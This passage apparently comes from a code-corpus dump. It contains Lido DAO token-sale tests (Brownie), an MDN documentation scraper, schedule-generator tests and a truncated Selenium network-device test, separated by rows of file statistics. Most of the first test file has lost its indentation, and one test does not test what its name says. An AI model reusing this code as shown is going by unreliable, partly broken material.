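purchase_timestamp = 1_600_000_000  # illustrative block timestamp
vesting_start = purchase_timestamp + VESTING_START_DELAY
vesting_cliff = purchase_timestamp + VESTING_START_DELAY  # cliff == start
vesting_end = purchase_timestamp + VESTING_END_DELAY

assert vesting_cliff == vesting_start
assert vesting_end - vesting_start == 365 * 24 * 60 * 60  # linear vesting over one further year
```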
def test_deploy_fails_on_wrong_allocations_total(accounts, deploy_executor_and_pass_dao_vote):
with reverts():
deploy_executor_and_pass_dao_vote(
eth_to_ldo_rate=ETH_TO_LDO_RATE,
vesting_start_delay=VESTING_START_DELAY,
vesting_end_delay=VESTING_END_DELAY,
offer_expiration_delay=OFFER_EXPIRATION_DELAY,
ldo_purchasers=[ (accounts[i], LDO_ALLOCATIONS[i]) for i in range(0, len(LDO_ALLOCATIONS)) ],
allocations_total=sum(LDO_ALLOCATIONS) + 1
)
def test_deploy_fails_on_zero_rate(accounts, deploy_executor_and_pass_dao_vote):
with reverts():
deploy_executor_and_pass_dao_vote(
eth_to_ldo_rate=0,
vesting_start_delay=VESTING_START_DELAY,
vesting_end_delay=VESTING_END_DELAY,
offer_expiration_delay=OFFER_EXPIRATION_DELAY,
ldo_purchasers=[ (accounts[i], LDO_ALLOCATIONS[i]) for i in range(0, len(LDO_ALLOCATIONS)) ],
allocations_total=sum(LDO_ALLOCATIONS)
)
def test_deploy_fails_on_vesting_ends_before_start(accounts, deploy_executor_and_pass_dao_vote):
with reverts():
deploy_executor_and_pass_dao_vote(
eth_to_ldo_rate=ETH_TO_LDO_RATE,
vesting_start_delay=VESTING_START_DELAY,
vesting_end_delay=VESTING_START_DELAY - 1,
offer_expiration_delay=OFFER_EXPIRATION_DELAY,
ldo_purchasers=[ (accounts[i], LDO_ALLOCATIONS[i]) for i in range(0, len(LDO_ALLOCATIONS)) ],
allocations_total=sum(LDO_ALLOCATIONS)
)
def test_deploy_fails_on_zero_offer_expiration_delay(accounts, deploy_executor_and_pass_dao_vote):
with reverts():
deploy_executor_and_pass_dao_vote(
eth_to_ldo_rate=ETH_TO_LDO_RATE,
vesting_start_delay=VESTING_START_DELAY,
vesting_end_delay=VESTING_END_DELAY,
offer_expiration_delay=0,
ldo_purchasers=[ (accounts[i], LDO_ALLOCATIONS[i]) for i in range(0, len(LDO_ALLOCATIONS)) ],
allocations_total=sum(LDO_ALLOCATIONS)
)
def test_deploy_fails_on_purchasers_duplicates(accounts, deploy_executor_and_pass_dao_vote):
with reverts():
deploy_executor_and_pass_dao_vote(
eth_to_ldo_rate=ETH_TO_LDO_RATE,
vesting_start_delay=VESTING_START_DELAY,
vesting_end_delay=VESTING_END_DELAY,
offer_expiration_delay=OFFER_EXPIRATION_DELAY,
ldo_purchasers=[ (accounts[0], LDO_ALLOCATIONS[0]) for i in range(0, len(LDO_ALLOCATIONS)) ],
allocations_total=sum(LDO_ALLOCATIONS)
)
def test_executor_config_is_correct(executor):
assert executor.eth_to_ldo_rate() == ETH_TO_LDO_RATE
assert executor.vesting_start_delay() == VESTING_START_DELAY
assert executor.vesting_end_delay() == VESTING_END_DELAY
assert executor.offer_expiration_delay() == OFFER_EXPIRATION_DELAY
assert executor.ldo_allocations_total() == sum(LDO_ALLOCATIONS)
assert executor.offer_started()
assert executor.offer_expires_at() == executor.offer_started_at() + OFFER_EXPIRATION_DELAY
def test_purchase_via_transfer(accounts, executor, dao_agent, helpers, ldo_token, dao_token_manager):
purchaser = accounts[0]
purchase_ldo_amount = LDO_ALLOCATIONS[0]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
allocation = executor.get_allocation(purchaser)
assert allocation[0] == purchase_ldo_amount
assert allocation[1] == eth_cost
helpers.fund_with_eth(purchaser, eth_cost)
dao_eth_balance_before = dao_agent.balance()
tx = purchaser.transfer(to=executor, amount=eth_cost, gas_limit=DIRECT_TRANSFER_GAS_LIMIT)
purchase_evt = helpers.assert_single_event_named('PurchaseExecuted', tx)
assert purchase_evt['ldo_receiver'] == purchaser
assert purchase_evt['ldo_allocation'] == purchase_ldo_amount
assert purchase_evt['eth_cost'] == eth_cost
dao_eth_balance_increase = dao_agent.balance() - dao_eth_balance_before
assert dao_eth_balance_increase == eth_cost
assert ldo_token.balanceOf(purchaser) == purchase_ldo_amount
vesting = dao_token_manager.getVesting(purchaser, purchase_evt['vesting_id'])
assert vesting['amount'] == purchase_ldo_amount
assert vesting['start'] == tx.timestamp + VESTING_START_DELAY
assert vesting['cliff'] == tx.timestamp + VESTING_START_DELAY
assert vesting['vesting'] == tx.timestamp + VESTING_END_DELAY
assert vesting['revokable'] == False
def test_purchase_via_execute_purchase(accounts, executor, dao_agent, helpers, ldo_token, dao_token_manager):
purchaser = accounts[0]
purchase_ldo_amount = LDO_ALLOCATIONS[0]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
allocation = executor.get_allocation(purchaser)
assert allocation[0] == purchase_ldo_amount
assert allocation[1] == eth_cost
helpers.fund_with_eth(purchaser, eth_cost)
dao_eth_balance_before = dao_agent.balance()
tx = executor.execute_purchase(purchaser, { 'from': purchaser, 'value': eth_cost })
purchase_evt = helpers.assert_single_event_named('PurchaseExecuted', tx)
assert purchase_evt['ldo_receiver'] == purchaser
assert purchase_evt['ldo_allocation'] == purchase_ldo_amount
assert purchase_evt['eth_cost'] == eth_cost
dao_eth_balance_increase = dao_agent.balance() - dao_eth_balance_before
assert dao_eth_balance_increase == eth_cost
assert ldo_token.balanceOf(purchaser) == purchase_ldo_amount
vesting = dao_token_manager.getVesting(purchaser, purchase_evt['vesting_id'])
assert vesting['amount'] == purchase_ldo_amount
assert vesting['start'] == tx.timestamp + VESTING_START_DELAY
assert vesting['cliff'] == tx.timestamp + VESTING_START_DELAY
assert vesting['vesting'] == tx.timestamp + VESTING_END_DELAY
assert vesting['revokable'] == False
def test_stranger_not_allowed_to_purchase_via_execute_purchase(accounts, executor, helpers):
purchase_ldo_amount = LDO_ALLOCATIONS[0]
stranger = accounts[5]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
allocation = executor.get_allocation(stranger)
assert allocation[0] == 0
assert allocation[1] == 0
helpers.fund_with_eth(stranger, eth_cost)
with reverts("no allocation"):
executor.execute_purchase(stranger, { 'from': stranger, 'value': eth_cost })
def test_stranger_not_allowed_to_purchase_via_transfer(accounts, executor, helpers):
purchase_ldo_amount = LDO_ALLOCATIONS[0]
stranger = accounts[5]
allocation = executor.get_allocation(stranger)
assert allocation[0] == 0
assert allocation[1] == 0
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
helpers.fund_with_eth(stranger, eth_cost)
with reverts("no allocation"):
executor.execute_purchase(stranger, { 'from': stranger, 'value': eth_cost })
def test_stranger_allowed_to_purchase_token_for_purchaser_via_execute_purchase(accounts, executor, dao_agent, helpers, ldo_token, dao_token_manager):
purchaser = accounts[0]
purchase_ldo_amount = LDO_ALLOCATIONS[0]
stranger = accounts[5]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
allocation = executor.get_allocation(purchaser)
assert allocation[0] == purchase_ldo_amount
assert allocation[1] == eth_cost
helpers.fund_with_eth(stranger, eth_cost)
dao_eth_balance_before = dao_agent.balance()
tx = executor.execute_purchase(purchaser, { 'from': stranger, 'value': eth_cost })
purchase_evt = helpers.assert_single_event_named('PurchaseExecuted', tx)
assert purchase_evt['ldo_receiver'] == purchaser
assert purchase_evt['ldo_allocation'] == purchase_ldo_amount
assert purchase_evt['eth_cost'] == eth_cost
dao_eth_balance_increase = dao_agent.balance() - dao_eth_balance_before
assert dao_eth_balance_increase == eth_cost
assert ldo_token.balanceOf(purchaser) == purchase_ldo_amount
vesting = dao_token_manager.getVesting(purchaser, purchase_evt['vesting_id'])
assert vesting['amount'] == purchase_ldo_amount
assert vesting['start'] == tx.timestamp + VESTING_START_DELAY
assert vesting['cliff'] == tx.timestamp + VESTING_START_DELAY
assert vesting['vesting'] == tx.timestamp + VESTING_END_DELAY
assert vesting['revokable'] == False
def test_purchase_via_transfer_not_allowed_with_insufficient_funds(accounts, executor, dao_agent, helpers):
purchaser = accounts[0]
purchase_ldo_amount = LDO_ALLOCATIONS[0]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
allocation = executor.get_allocation(purchaser)
assert allocation[0] == purchase_ldo_amount
assert allocation[1] == eth_cost
eth_cost = eth_cost - 1e18
helpers.fund_with_eth(purchaser, eth_cost)
with reverts("insufficient funds"):
purchaser.transfer(to=executor, amount=eth_cost, gas_limit=DIRECT_TRANSFER_GAS_LIMIT)
def test_purchase_via_execute_purchase_not_allowed_with_insufficient_funds(accounts, executor, helpers):
purchaser = accounts[0]
purchase_ldo_amount = LDO_ALLOCATIONS[0]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
allocation = executor.get_allocation(purchaser)
assert allocation[0] == purchase_ldo_amount
assert allocation[1] == eth_cost
eth_cost = eth_cost - 1e18
helpers.fund_with_eth(purchaser, eth_cost)
with reverts("insufficient funds"):
executor.execute_purchase(purchaser, { 'from': purchaser, 'value': eth_cost })
def test_double_purchase_not_allowed_via_transfer(accounts, executor, helpers, ldo_token, dao_token_manager, dao_agent):
purchaser = accounts[0]
purchase_ldo_amount = LDO_ALLOCATIONS[0]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
allocation = executor.get_allocation(purchaser)
assert allocation[0] == purchase_ldo_amount
assert allocation[1] == eth_cost
helpers.fund_with_eth(purchaser, eth_cost)
dao_eth_balance_before = dao_agent.balance()
tx = purchaser.transfer(to=executor, amount=eth_cost, gas_limit=DIRECT_TRANSFER_GAS_LIMIT)
purchase_evt = helpers.assert_single_event_named('PurchaseExecuted', tx)
assert purchase_evt['ldo_receiver'] == purchaser
assert purchase_evt['ldo_allocation'] == purchase_ldo_amount
assert purchase_evt['eth_cost'] == eth_cost
dao_eth_balance_increase = dao_agent.balance() - dao_eth_balance_before
assert dao_eth_balance_increase == eth_cost
assert ldo_token.balanceOf(purchaser) == purchase_ldo_amount
with reverts("no allocation"):
purchaser.transfer(to=executor, amount=eth_cost, gas_limit=DIRECT_TRANSFER_GAS_LIMIT)
def test_double_purchase_not_allowed_via_execute_purchase(accounts, executor, dao_agent, helpers, ldo_token):
purchaser = accounts[0]
purchase_ldo_amount = LDO_ALLOCATIONS[0]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
allocation = executor.get_allocation(purchaser)
assert allocation[0] == purchase_ldo_amount
assert allocation[1] == eth_cost
helpers.fund_with_eth(purchaser, eth_cost)
executor.execute_purchase(purchaser, { 'from': purchaser, 'value': eth_cost })
with reverts("no allocation"):
executor.execute_purchase(purchaser, { 'from': purchaser, 'value': eth_cost })

def test_overpay_is_returned_via_transfer(accounts, executor, dao_agent, helpers, ldo_token):
    purchaser = accounts[0]
    purchase_ldo_amount = LDO_ALLOCATIONS[0]
    eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
    overpay_amount = 10**18  # int, not 1e18: float arithmetic loses precision at wei scale

    allocation = executor.get_allocation(purchaser)
    assert allocation[0] == purchase_ldo_amount
    assert allocation[1] == eth_cost

    initial_purchaser_balance = purchaser.balance()
    helpers.fund_with_eth(purchaser, eth_cost + overpay_amount)
    assert purchaser.balance() == initial_purchaser_balance + eth_cost + overpay_amount

    dao_eth_balance_before = dao_agent.balance()
    tx = purchaser.transfer(to=executor, amount=eth_cost + overpay_amount, gas_limit=DIRECT_TRANSFER_GAS_LIMIT)

    purchase_evt = helpers.assert_single_event_named('PurchaseExecuted', tx)
    assert purchaser.balance() == initial_purchaser_balance + overpay_amount
    assert purchase_evt['ldo_receiver'] == purchaser
    assert purchase_evt['ldo_allocation'] == purchase_ldo_amount
    assert purchase_evt['eth_cost'] == eth_cost

    dao_eth_balance_increase = dao_agent.balance() - dao_eth_balance_before
    assert dao_eth_balance_increase == eth_cost
    assert ldo_token.balanceOf(purchaser) == purchase_ldo_amount

def test_overpay_is_returned_via_execute_purchase(accounts, executor, dao_agent, helpers, ldo_token):
    purchaser = accounts[0]
    purchase_ldo_amount = LDO_ALLOCATIONS[0]
    eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
    overpay_amount = 10**18  # int, not 1e18: float arithmetic loses precision at wei scale

    allocation = executor.get_allocation(purchaser)
    assert allocation[0] == purchase_ldo_amount
    assert allocation[1] == eth_cost

    initial_purchaser_balance = purchaser.balance()
    helpers.fund_with_eth(purchaser, eth_cost + overpay_amount)
    assert purchaser.balance() == initial_purchaser_balance + eth_cost + overpay_amount

    dao_eth_balance_before = dao_agent.balance()
    tx = executor.execute_purchase(purchaser, {'from': purchaser, 'value': eth_cost + overpay_amount})

    purchase_evt = helpers.assert_single_event_named('PurchaseExecuted', tx)
    assert purchaser.balance() == initial_purchaser_balance + overpay_amount
    assert purchase_evt['ldo_receiver'] == purchaser
    assert purchase_evt['ldo_allocation'] == purchase_ldo_amount
    assert purchase_evt['eth_cost'] == eth_cost

    dao_eth_balance_increase = dao_agent.balance() - dao_eth_balance_before
    assert dao_eth_balance_increase == eth_cost
    assert ldo_token.balanceOf(purchaser) == purchase_ldo_amount

def test_purchase_not_allowed_after_expiration_via_transfer(accounts, executor, helpers):
    chain = Chain()
    purchaser = accounts[0]
    purchase_ldo_amount = LDO_ALLOCATIONS[0]
    eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE

    allocation = executor.get_allocation(purchaser)
    assert allocation[0] == purchase_ldo_amount
    assert allocation[1] == eth_cost

    helpers.fund_with_eth(purchaser, eth_cost)

    expiration_delay = executor.offer_expires_at() - chain.time()
    chain.sleep(expiration_delay + 3600)
    chain.mine()

    with reverts("offer expired"):
        purchaser.transfer(to=executor, amount=eth_cost, gas_limit=DIRECT_TRANSFER_GAS_LIMIT)

def test_purchase_not_allowed_after_expiration_via_execute_purchase(accounts, executor, helpers):
    chain = Chain()
    purchaser = accounts[0]
    purchase_ldo_amount = LDO_ALLOCATIONS[0]
    eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE

    allocation = executor.get_allocation(purchaser)
    assert allocation[0] == purchase_ldo_amount
    assert allocation[1] == eth_cost

    helpers.fund_with_eth(purchaser, eth_cost)

    expiration_delay = executor.offer_expires_at() - chain.time()
    chain.sleep(expiration_delay + 3600)
    chain.mine()

    with reverts("offer expired"):
        executor.execute_purchase(purchaser, {'from': purchaser, 'value': eth_cost})

def test_recover_unsold_tokens_not_allowed_until_expiration(executor, dao_agent):
    with reverts():
        executor.recover_unsold_tokens()

def test_recover_unsold_tokens_returns_unsold_tokens_to_dao_vault_after_expiration(executor, dao_agent, ldo_token):
    chain = Chain()
    expiration_delay = executor.offer_expires_at() - chain.time()
    chain.sleep(expiration_delay + 3600)
    chain.mine()

    executor_balance = ldo_token.balanceOf(executor)
    dao_agent_balance = ldo_token.balanceOf(dao_agent)

    executor.recover_unsold_tokens()

    assert ldo_token.balanceOf(executor) == 0
    assert ldo_token.balanceOf(dao_agent) == dao_agent_balance + executor_balance
| 38.103753 | 149 | 0.755286 | 2,252 | 17,261 | 5.349023 | 0.059947 | 0.044164 | 0.073385 | 0.040843 | 0.907853 | 0.887265 | 0.86701 | 0.85132 | 0.839532 | 0.831064 | 0 | 0.011654 | 0.15984 | 17,261 | 452 | 150 | 38.188053 | 0.81899 | 0.002723 | 0 | 0.786408 | 0 | 0 | 0.036783 | 0 | 0 | 0 | 0 | 0 | 0.291262 | 1 | 0.071197 | false | 0.038835 | 0.012945 | 0 | 0.087379 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ca9c4899592f6d4da04cf64d33501520f938b37d | 9,403 | py | Python | mdn/scraper.py | nugycal/experiments | 089b9bb294afc3c5e6856aff15aaeeed21af71c4 | [
"MIT"
] | null | null | null | mdn/scraper.py | nugycal/experiments | 089b9bb294afc3c5e6856aff15aaeeed21af71c4 | [
"MIT"
] | null | null | null | mdn/scraper.py | nugycal/experiments | 089b9bb294afc3c5e6856aff15aaeeed21af71c4 | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup
import requests
import json
import re
import os
API_URL = "https://developer.mozilla.org/en-US/docs/feeds/json/tag/Javascript"
REFERENCE_URL = "https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference"
BASE_URL = "https://developer.mozilla.org"
data = requests.get(REFERENCE_URL)
soup = BeautifulSoup(data.text, 'html.parser')
parent = soup.find("article", { "id": "wikiArticle" })
matches = []
links = []
for match in parent.find_all("a", href=True):
    if re.sub('#[a-zA-Z0-9_=]*$', '', match['href']) not in matches:
        links.append(re.sub(r'#.*', '', match["href"]))
        matches.append(re.sub(r'#.*', '', match["href"]))
try:
    os.mkdir("output")
except OSError:  # narrow the bare except so SystemExit/KeyboardInterrupt are not swallowed
    print("Couldn't create output directory")
    exit(1)
try:
    os.mkdir("output/res")
except OSError:
    print("Couldn't create resources directory")
    exit(1)
linked_res = []
extra_links = []

for link in links:
    data = requests.get(BASE_URL + link)
    data = data.text
    soup = BeautifulSoup(data, 'html.parser')
    quick_links = soup.find("div", {'class': 'quick-links'})
    for a in quick_links.find_all("a", href=True):
        if re.sub('#[a-zA-Z0-9_=]*$', '', a['href']) not in links:
            extra_links.append(a['href'])
    for a in soup.find_all("a", href=True):
        if '/en-US/docs/' in a['href']:
            a['href'] = a['href'].replace('/en-US/docs/', '/')
        elif '/en-US/' == a['href']:
            a['href'] = '/'
        if not a['href'].endswith('.html') and not a['href'].endswith('/'):
            a['href'] += ".html"
    filename = re.sub('.*/', '', link)
    if filename == '':
        filename = "index.html"
    if not filename.endswith(".html"):
        filename += ".html"
    dirent = re.sub('/[^/]*$', '', link.replace('/en-US/docs/', '/'))
    # Drop live code examples and interactive iframes from the saved page.
    for example in soup.find_all("pre", {'class': 'brush:'}):
        example.decompose()
    for example in soup.find_all("iframe", {'class': 'interactive'}):
        example.decompose()
    for stylesheet in soup.find_all("link", href=True):
        if "http" in stylesheet['href'] and stylesheet['href'] not in linked_res and stylesheet['href'] not in links:
            linked_res.append(stylesheet['href'])
            sheet = requests.get(stylesheet['href'])
            sheet = sheet.text
            with open("output/res/" + re.sub(r'.*/', '', stylesheet['href']), "w") as f:
                f.write(sheet)
        elif stylesheet['href'] not in linked_res and stylesheet['href'] not in links and not stylesheet['href'].endswith('/'):
            stylesheet['href'] = "https://developer.mozilla.org" + stylesheet['href']
            linked_res.append(stylesheet['href'])
            sheet = requests.get(stylesheet['href'])
            sheet = sheet.text
            with open("output/res/" + re.sub(r'.*/', '', stylesheet['href']), "w") as f:
                f.write(sheet)
        if "http" in stylesheet['href']:
            stylesheet['href'] = "/res/" + re.sub(r'.*/', '', stylesheet['href'])
    for script in soup.find_all("script", src=True):
        if "http" in script['src'] and script['src'] not in linked_res:
            linked_res.append(script['src'])
            sheet = requests.get(script['src'])
            sheet = sheet.text
            with open("output/res/" + re.sub(r'.*/', '', script['src']), "w") as f:
                f.write(sheet)
        elif script['src'] not in linked_res and not script['src'].endswith('/'):  # was stylesheet['href'], a stale variable from the previous loop
            script['src'] = "https://developer.mozilla.org" + script['src']
            linked_res.append(script['src'])
            sheet = requests.get(script['src'])
            sheet = sheet.text
            with open("output/res/" + re.sub(r'.*/', '', script['src']), "w") as f:
                f.write(sheet)
        if "http" in script['src']:
            script['src'] = "/res/" + re.sub(r'.*/', '', script['src'])
    for image in soup.find_all("img", src=True):
        if "http" in image['src'] and image['src'] not in linked_res:
            linked_res.append(image['src'])
            sheet = requests.get(image['src'])
            with open("output/res/" + re.sub(r'.*/', '', image['src']), "wb") as f:
                f.write(sheet.content)
        elif image['src'] not in linked_res and not image['src'].endswith('/'):  # was stylesheet['href'], a stale variable from the previous loop
            image['src'] = "https://developer.mozilla.org" + image['src']
            linked_res.append(image['src'])
            sheet = requests.get(image['src'])
            with open("output/res/" + re.sub(r'.*/', '', image['src']), "wb") as f:
                f.write(sheet.content)
        if "http" in image['src']:  # was stylesheet['href'], a stale variable from the previous loop
            image['src'] = "/res/" + re.sub(r'.*/', '', image['src'])
    try:
        os.makedirs("output/" + dirent)
    except OSError:
        print("Failed to construct directory tree: " + "output/" + dirent)
    with open("output/" + dirent + "/" + filename, "w") as f:
        f.write(str(soup))
    with open("output/index.html", "a") as f:
        f.write('<a href="' + dirent + "/" + filename + '">' + re.sub(r'.*/', '', link) + "</a><br>")

for link in extra_links:
    data = requests.get(BASE_URL + link)
    data = data.text
    soup = BeautifulSoup(data, 'html.parser')
    for a in soup.find_all("a", href=True):
        if '/en-US/docs/' in a['href']:
            a['href'] = a['href'].replace('/en-US/docs/', '/') + ".html"
        elif '/en-US/' == a['href']:
            a['href'] = '/'
        if not a['href'].endswith('.html') and not a['href'].endswith('/'):
            a['href'] += ".html"
    filename = re.sub('.*/', '', link)
    if filename == '':
        filename = "index.html"
    if not filename.endswith(".html"):
        filename += ".html"
    dirent = re.sub('/[^/]*$', '', link.replace('/en-US/docs/', '/'))
    for example in soup.find_all("pre", {'class': 'brush:'}):
        example.decompose()
    for example in soup.find_all("iframe", {'class': 'interactive'}):
        example.decompose()
    for stylesheet in soup.find_all("link", href=True):
        if "http" in stylesheet['href'] and stylesheet['href'] not in linked_res and stylesheet['href'] not in links:
            linked_res.append(stylesheet['href'])
            sheet = requests.get(stylesheet['href'])
            sheet = sheet.text
            with open("output/res/" + re.sub(r'.*/', '', stylesheet['href']), "w") as f:
                f.write(sheet)
        elif stylesheet['href'] not in linked_res and stylesheet['href'] not in links and not stylesheet['href'].endswith('/'):
            stylesheet['href'] = "https://developer.mozilla.org" + stylesheet['href']
            linked_res.append(stylesheet['href'])
            sheet = requests.get(stylesheet['href'])
            sheet = sheet.text
            with open("output/res/" + re.sub(r'.*/', '', stylesheet['href']), "w") as f:
                f.write(sheet)
        if "http" in stylesheet['href']:
            stylesheet['href'] = "/res/" + re.sub(r'.*/', '', stylesheet['href'])
    for script in soup.find_all("script", src=True):
        if "http" in script['src'] and script['src'] not in linked_res:
            linked_res.append(script['src'])
            sheet = requests.get(script['src'])
            sheet = sheet.text
            with open("output/res/" + re.sub(r'.*/', '', script['src']), "w") as f:
                f.write(sheet)
        elif script['src'] not in linked_res and not script['src'].endswith('/'):  # was stylesheet['href'], a stale variable from the previous loop
            script['src'] = "https://developer.mozilla.org" + script['src']
            linked_res.append(script['src'])
            sheet = requests.get(script['src'])
            sheet = sheet.text
            with open("output/res/" + re.sub(r'.*/', '', script['src']), "w") as f:
                f.write(sheet)
        if "http" in script['src']:
            script['src'] = "/res/" + re.sub(r'.*/', '', script['src'])
    for image in soup.find_all("img", src=True):
        if "http" in image['src'] and image['src'] not in linked_res:
            linked_res.append(image['src'])
            sheet = requests.get(image['src'])
            with open("output/res/" + re.sub(r'.*/', '', image['src']), "wb") as f:
                f.write(sheet.content)
        elif image['src'] not in linked_res and not image['src'].endswith('/'):  # was stylesheet['href'], a stale variable from the previous loop
            image['src'] = "https://developer.mozilla.org" + image['src']
            linked_res.append(image['src'])
            sheet = requests.get(image['src'])
            with open("output/res/" + re.sub(r'.*/', '', image['src']), "wb") as f:
                f.write(sheet.content)
        if "http" in image['src']:  # was stylesheet['href'], a stale variable from the previous loop
            image['src'] = "/res/" + re.sub(r'.*/', '', image['src'])
    try:
        os.makedirs("output/" + re.sub(r'/[A-Za-z\._]+$', '', link).replace('/en-US/docs/', ''))
    except OSError:
        print("Failed to construct directory tree: " + "output/" + re.sub(r'/[A-Za-z\._]+$', '', link).replace('/en-US/docs/', ''))
    with open("output/" + re.sub(r'/[A-Za-z\._]+$', '', link).replace('/en-US/docs/', '') + "/" + re.sub(r'.*/', '', link) + ".html", "w") as f:
        f.write(str(soup))
    with open("output/index.html", "a") as f:
        f.write('<a href="' + re.sub(r'/[A-Za-z\._]+$', '', link).replace('/en-US/docs/', '') + "/" + re.sub(r'.*/', '', link) + ".html" + '">' + re.sub(r'.*/', '', link) + "</a><br>")
| 43.939252 | 184 | 0.532596 | 1,209 | 9,403 | 4.09512 | 0.087676 | 0.113108 | 0.035144 | 0.032721 | 0.893153 | 0.878004 | 0.86427 | 0.86427 | 0.850131 | 0.850131 | 0 | 0.000988 | 0.246198 | 9,403 | 213 | 185 | 44.14554 | 0.697517 | 0 | 0 | 0.797814 | 0 | 0.005464 | 0.19632 | 0 | 0.005464 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.027322 | 0 | 0.027322 | 0.021858 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
04b0b380424bea9b6a4f709cde307959439c5655 | 2,495 | py | Python | tests/test_lhs_schedule_generator.py | stbalduin/memobuilder | c99eb8e711d5109c1322f443441b5a07c079e2f0 | [
"MIT"
] | null | null | null | tests/test_lhs_schedule_generator.py | stbalduin/memobuilder | c99eb8e711d5109c1322f443441b5a07c079e2f0 | [
"MIT"
] | null | null | null | tests/test_lhs_schedule_generator.py | stbalduin/memobuilder | c99eb8e711d5109c1322f443441b5a07c079e2f0 | [
"MIT"
] | null | null | null | from memoutil.schedules import LHSScheduleGenerator

def test_lhs_schedule_generator_with_maximum_slot_number():
    num_schedules = 10  # total number of schedules to generate
    resolution = 900    # simulation step size: time difference of two schedule items in seconds
    duration = 86400    # total duration of each target schedule: one day
    num_slots = 96      # number of slots for the target schedule: 96 slots of 900 s each cover one day
    min = -1000.
    max = 1000.
    schedules = LHSScheduleGenerator.generate_schedules(num_schedules, resolution, duration, num_slots, min, max)
    assert len(schedules) == 10
    for schedule in schedules:
        assert len(schedule) == 96
        assert all([v > min for v in schedule])
        assert all([v < max for v in schedule])

def test_lhs_schedule_generator_with_slots_of_1Hour():
    num_schedules = 10  # total number of schedules to generate
    resolution = 900    # simulation step size: time difference of two schedule items in seconds
    duration = 86400    # total duration of each target schedule: one day
    num_slots = 24      # number of slots for the target schedule: 24 slots of one hour each cover one day
    min = -1000.
    max = 1000.
    schedules = LHSScheduleGenerator.generate_schedules(num_schedules, resolution, duration, num_slots, min, max)
    assert len(schedules) == 10
    for schedule in schedules:
        assert len(schedule) == 96
        assert all([v > min for v in schedule])
        assert all([v < max for v in schedule])

def test_lhs_schedule_generator_with_slots_of_4Hour():
    num_schedules = 10  # total number of schedules to generate
    resolution = 900    # simulation step size: time difference of two schedule items in seconds
    duration = 86400    # total duration of each target schedule: one day
    num_slots = 6       # number of slots for the target schedule: 6 slots of four hours each cover one day
    min = -1000.
    max = 1000.
    schedules = LHSScheduleGenerator.generate_schedules(num_schedules, resolution, duration, num_slots, min, max)
    assert len(schedules) == 10
    for schedule in schedules:
        assert len(schedule) == 96
        assert all([v > min for v in schedule])
        assert all([v < max for v in schedule])

if __name__ == '__main__':
    # test_lhs_schedule_generator_with_slots_of_1Hour()
    test_lhs_schedule_generator_with_slots_of_4Hour()
04d35da1e0d1f0eafc3cbd5c3894e4951704f810 | 33,508 | py | Python | fnat_testset/testcase/testcategory_1/testgroup_4.py | lizhouw-netscout/fnat | 684958773379a9205857f1932de443ed0c4334a0 | [
"Apache-2.0"
] | null | null | null | fnat_testset/testcase/testcategory_1/testgroup_4.py | lizhouw-netscout/fnat | 684958773379a9205857f1932de443ed0c4334a0 | [
"Apache-2.0"
] | null | null | null | fnat_testset/testcase/testcategory_1/testgroup_4.py | lizhouw-netscout/fnat | 684958773379a9205857f1932de443ed0c4334a0 | [
"Apache-2.0"
] | null | null | null | from fnat_dev import FnatDevice
from switch import Switch
import time
import sys
import os
from gateway import Gateway
from dhcp import DHCP
from dns import DNS
from nistnet import Nistnet
from demo import UITest
import serial
import pymongo
from pymongo import MongoClient
from selenium import webdriver
from wifi import Cell,Scheme
from hp2910 import HP2910

def setUp():
    print "Method setUp in class testclass_4"
    print('These are led events testset')

def tearDown():
    print "Method tearDown in class testclass_4"
    print('These are led events testset')

def testmethod_1():
    print "Method testmethod_1 in class testclass_4"
    print "Method GW empty, DNS empty, WWW hostname in class testclass_4"
    __author__ = 'bzhang4'
    scheme = Scheme.find('wlan0', '1234')
    time.sleep(5)
    scheme.activate()
    ui_operation = UITest()
    ui_operation.ping_config('www.baidu.com')
    time.sleep(3)
    ui_operation.proxy_off_config()
    time.sleep(5)
    ui_operation.static_config_retest('192.168.2.33', '255.255.255.0', '0.0.0.0', '0.0.0.0')
    browser = webdriver.Firefox()
    browser.get('http://172.16.9.9')
    time.sleep(3)
    ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
    GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
    cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
    print(cloud_value)
    known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
    known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
